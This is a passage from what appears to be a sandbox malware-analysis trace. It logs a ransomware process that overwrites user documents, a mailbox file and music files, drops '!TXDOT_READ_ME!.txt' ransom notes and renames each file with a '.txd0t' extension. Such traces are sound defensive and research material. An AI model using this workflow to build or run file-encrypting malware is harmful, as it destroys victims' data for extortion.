nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0074.037] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffe79a1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.037] ReadFile (in: hFile=0x46c, lpBuffer=0x380d020, nNumberOfBytesToRead=0x18450, lpNumberOfBytesRead=0x414f670, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f670*=0x18450, lpOverlapped=0x0) returned 1 [0074.039] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffe7bb0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.039] WriteFile (in: hFile=0x46c, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x18450, lpNumberOfBytesWritten=0x414f674, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f674*=0x18450, lpOverlapped=0x0) returned 1 [0074.039] FlushFileBuffers (hFile=0x46c) returned 1 [0074.064] GetProcessHeap () returned 0xe30000 [0074.064] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x100) returned 0xecf498 [0074.064] StrCpyW (in: psz1=0xecf498, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\chS1ef v8z.odp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\chS1ef v8z.odp") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\chS1ef v8z.odp" [0074.064] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\chS1ef v8z.odp") returned="chS1ef v8z.odp" [0074.064] StrCpyW (in: psz1=0xecf4d4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.064] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt") returned 1 [0074.064] GetProcessHeap () returned 0xe30000 [0074.064] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecf498 | out: hHeap=0xe30000) returned 1 [0074.064] CloseHandle (hObject=0x46c) returned 1 [0074.068] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\chS1ef v8z.odp" (normalized: "c:\\users\\fd1hvy\\documents\\chs1ef v8z.odp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\chS1ef v8z.odp.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\chs1ef v8z.odp.txd0t")) returned 1 [0074.068] SetEvent (hEvent=0x404) returned 1 [0074.068] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0074.080] StrCpyW (in: psz1=0x414f6b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lLleeaH.xlsx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lLleeaH.xlsx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lLleeaH.xlsx" [0074.080] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lLleeaH.xlsx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lLleeaH.xlsx.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lLleeaH.xlsx.txd0t" [0074.080] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lLleeaH.xlsx.txd0t") returned 0 [0074.081] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lLleeaH.xlsx", dwFileAttributes=0x80) returned 1 [0074.081] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lLleeaH.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\llleeah.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0074.081] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=46988) returned 1 [0074.081] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.081] WriteFile (in: hFile=0x46c, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0074.082] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffff4674, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.082] ReadFile (in: hFile=0x46c, lpBuffer=0x380d020, nNumberOfBytesToRead=0xb780, lpNumberOfBytesRead=0x414f670, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f670*=0xb780, lpOverlapped=0x0) returned 1 [0074.084] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffff4880, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.085] WriteFile (in: hFile=0x46c, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0xb780, lpNumberOfBytesWritten=0x414f674, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f674*=0xb780, lpOverlapped=0x0) returned 1 [0074.085] FlushFileBuffers (hFile=0x46c) returned 1 [0074.274] GetProcessHeap () returned 0xe30000 [0074.274] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xfc) returned 0xecf288 [0074.274] StrCpyW (in: psz1=0xecf288, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lLleeaH.xlsx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lLleeaH.xlsx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lLleeaH.xlsx" [0074.274] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lLleeaH.xlsx") returned="lLleeaH.xlsx" [0074.274] StrCpyW (in: psz1=0xecf2c4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.274] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt") returned 1 [0074.275] GetProcessHeap () returned 0xe30000 [0074.275] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecf288 | out: hHeap=0xe30000) returned 1 [0074.275] CloseHandle (hObject=0x46c) returned 1 [0074.276] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lLleeaH.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\llleeah.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\lLleeaH.xlsx.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\llleeah.xlsx.txd0t")) returned 1 [0074.277] SetEvent (hEvent=0x404) returned 1 [0074.277] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0074.278] StrCpyW (in: psz1=0x414f6b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\mDGOSIz_qds.docx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\mDGOSIz_qds.docx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\mDGOSIz_qds.docx" [0074.278] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\mDGOSIz_qds.docx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\mDGOSIz_qds.docx.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\mDGOSIz_qds.docx.txd0t" [0074.278] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\mDGOSIz_qds.docx.txd0t") returned 0 [0074.279] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\mDGOSIz_qds.docx", dwFileAttributes=0x80) returned 1 [0074.279] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\mDGOSIz_qds.docx" (normalized: "c:\\users\\fd1hvy\\documents\\mdgosiz_qds.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0074.279] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=92598) returned 1 [0074.279] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.279] WriteFile (in: hFile=0x46c, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0074.280] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffe944a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.280] ReadFile (in: hFile=0x46c, lpBuffer=0x380d020, nNumberOfBytesToRead=0x169b0, lpNumberOfBytesRead=0x414f670, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f670*=0x169b0, lpOverlapped=0x0) returned 1 [0074.282] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffe9650, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.282] WriteFile (in: hFile=0x46c, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x169b0, lpNumberOfBytesWritten=0x414f674, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f674*=0x169b0, lpOverlapped=0x0) returned 1 [0074.282] FlushFileBuffers (hFile=0x46c) returned 1 [0074.303] GetProcessHeap () returned 0xe30000 [0074.303] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x104) returned 0xe9d750 [0074.303] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\mDGOSIz_qds.docx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\mDGOSIz_qds.docx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\mDGOSIz_qds.docx" [0074.303] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\mDGOSIz_qds.docx") returned="mDGOSIz_qds.docx" [0074.303] StrCpyW (in: psz1=0xe9d78c, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.303] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt") returned 1 [0074.303] GetProcessHeap () returned 0xe30000 [0074.303] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0074.303] CloseHandle (hObject=0x46c) returned 1 [0074.306] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\mDGOSIz_qds.docx" (normalized: "c:\\users\\fd1hvy\\documents\\mdgosiz_qds.docx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\mDGOSIz_qds.docx.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\mdgosiz_qds.docx.txd0t")) returned 1 [0074.306] SetEvent (hEvent=0x404) returned 1 [0074.306] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0074.314] StrCpyW (in: psz1=0x414f690, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst" [0074.314] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst.txd0t" [0074.314] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst.txd0t") returned 0 [0074.314] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst", dwFileAttributes=0x80) returned 1 [0074.314] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files\\kkcie@kdj.kd.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0074.315] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=271360) returned 1 [0074.315] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.315] WriteFile (in: hFile=0x47c, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0074.317] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffbda00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.318] ReadFile (in: hFile=0x47c, lpBuffer=0x380d020, nNumberOfBytesToRead=0x42400, lpNumberOfBytesRead=0x414f650, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f650*=0x42400, lpOverlapped=0x0) returned 1 [0074.335] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffbdc00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.335] WriteFile (in: hFile=0x47c, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x42400, lpNumberOfBytesWritten=0x414f654, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f654*=0x42400, lpOverlapped=0x0) returned 1 [0074.336] FlushFileBuffers (hFile=0x47c) returned 1 [0074.358] GetProcessHeap () returned 0xe30000 [0074.358] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x120) returned 0xe9b648 [0074.358] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst" [0074.358] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst") returned="kkcie@kdj.kd.pst" [0074.358] StrCpyW (in: psz1=0xe9b6a0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.358] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Outlook Files\\!TXDOT_READ_ME!.txt") returned 0 [0074.359] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Outlook Files\\!TXDOT_READ_ME!.txt" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0074.359] WriteFile (in: hFile=0x468, lpBuffer=0x414f684*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x414f680, lpOverlapped=0x0 | out: lpBuffer=0x414f684*, lpNumberOfBytesWritten=0x414f680*=0x2, lpOverlapped=0x0) returned 1 [0074.360] FlushFileBuffers (hFile=0x468) returned 1 [0074.373] WriteFile (in: hFile=0x468, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x414f680, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x414f680*=0x7f0, lpOverlapped=0x0) returned 1 [0074.387] FlushFileBuffers (hFile=0x468) returned 1 [0074.403] CloseHandle (hObject=0x468) returned 1 [0074.403] GetProcessHeap () returned 0xe30000 [0074.403] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0074.403] CloseHandle (hObject=0x47c) returned 1 [0074.410] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files\\kkcie@kdj.kd.pst"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files\\kkcie@kdj.kd.pst.txd0t")) returned 1 [0074.410] SetEvent (hEvent=0x404) returned 1 [0074.410] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0074.564] StrCpyW (in: psz1=0x414f6a0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\yvlM_ciBT0jsrUW.pptx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\yvlM_ciBT0jsrUW.pptx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\yvlM_ciBT0jsrUW.pptx" [0074.564] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\yvlM_ciBT0jsrUW.pptx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\yvlM_ciBT0jsrUW.pptx.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\yvlM_ciBT0jsrUW.pptx.txd0t" [0074.564] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\yvlM_ciBT0jsrUW.pptx.txd0t") returned 0 [0074.564] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\yvlM_ciBT0jsrUW.pptx", dwFileAttributes=0x80) returned 1 [0074.564] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\yvlM_ciBT0jsrUW.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\yvlm_cibt0jsruw.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0074.564] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=12613) returned 1 [0074.564] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.565] WriteFile (in: hFile=0x464, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0074.565] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xffffccbb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.565] ReadFile (in: hFile=0x464, lpBuffer=0x380d020, nNumberOfBytesToRead=0x3140, lpNumberOfBytesRead=0x414f660, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f660*=0x3140, lpOverlapped=0x0) returned 1 [0074.566] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xffffcec0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.566] WriteFile (in: hFile=0x464, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x3140, lpNumberOfBytesWritten=0x414f664, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f664*=0x3140, lpOverlapped=0x0) returned 1 [0074.566] FlushFileBuffers (hFile=0x464) returned 1 [0074.576] GetProcessHeap () returned 0xe30000 [0074.576] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10c) returned 0xed2d00 [0074.576] StrCpyW (in: psz1=0xed2d00, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\yvlM_ciBT0jsrUW.pptx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\yvlM_ciBT0jsrUW.pptx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\yvlM_ciBT0jsrUW.pptx" [0074.576] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\yvlM_ciBT0jsrUW.pptx") returned="yvlM_ciBT0jsrUW.pptx" [0074.576] StrCpyW (in: psz1=0xed2d3c, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.576] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt") returned 1 [0074.576] GetProcessHeap () returned 0xe30000 [0074.576] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2d00 | out: hHeap=0xe30000) returned 1 [0074.576] CloseHandle (hObject=0x464) returned 1 [0074.578] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\yvlM_ciBT0jsrUW.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\yvlm_cibt0jsruw.pptx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\yvlM_ciBT0jsrUW.pptx.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\yvlm_cibt0jsruw.pptx.txd0t")) returned 1 [0075.133] SetEvent (hEvent=0x404) returned 1 [0075.133] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0075.138] StrCpyW (in: psz1=0x414f6a0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\5YOR.m4a" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\5YOR.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\5YOR.m4a" [0075.138] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\5YOR.m4a", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\5YOR.m4a.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\5YOR.m4a.txd0t" [0075.138] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\5YOR.m4a.txd0t") returned 0 [0075.139] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\5YOR.m4a", dwFileAttributes=0x80) returned 1 [0075.143] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\5YOR.m4a" (normalized: "c:\\users\\fd1hvy\\music\\z37nyamgu2jp3cfwiu\\5yor.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0075.143] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=94403) returned 1 [0075.144] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.144] WriteFile (in: hFile=0x46c, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0075.144] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffe8d3d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.144] ReadFile (in: hFile=0x46c, lpBuffer=0x380d020, nNumberOfBytesToRead=0x170c0, lpNumberOfBytesRead=0x414f660, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f660*=0x170c0, lpOverlapped=0x0) returned 1 [0075.146] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffe8f40, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.146] WriteFile (in: hFile=0x46c, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x170c0, lpNumberOfBytesWritten=0x414f664, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f664*=0x170c0, lpOverlapped=0x0) returned 1 [0075.147] FlushFileBuffers (hFile=0x46c) returned 1 [0075.160] GetProcessHeap () returned 0xe30000 [0075.160] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x112) returned 0xed17d0 [0075.160] StrCpyW (in: psz1=0xed17d0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\5YOR.m4a" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\5YOR.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\5YOR.m4a" [0075.160] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\5YOR.m4a") returned="5YOR.m4a" [0075.160] StrCpyW (in: psz1=0xed182a, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0075.160] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\!TXDOT_READ_ME!.txt") returned 0 [0075.160] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\!TXDOT_READ_ME!.txt" (normalized: "c:\\users\\fd1hvy\\music\\z37nyamgu2jp3cfwiu\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.161] WriteFile (in: hFile=0x460, lpBuffer=0x414f694*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x414f690, lpOverlapped=0x0 | out: lpBuffer=0x414f694*, lpNumberOfBytesWritten=0x414f690*=0x2, lpOverlapped=0x0) returned 1 [0075.162] FlushFileBuffers (hFile=0x460) returned 1 [0075.170] WriteFile (in: hFile=0x460, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x414f690, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x414f690*=0x7f0, lpOverlapped=0x0) returned 1 [0075.175] FlushFileBuffers (hFile=0x460) returned 1 [0075.196] CloseHandle (hObject=0x460) returned 1 [0075.197] GetProcessHeap () returned 0xe30000 [0075.197] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed17d0 | out: hHeap=0xe30000) returned 1 [0075.197] CloseHandle (hObject=0x46c) returned 1 [0075.199] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\5YOR.m4a" (normalized: "c:\\users\\fd1hvy\\music\\z37nyamgu2jp3cfwiu\\5yor.m4a"), 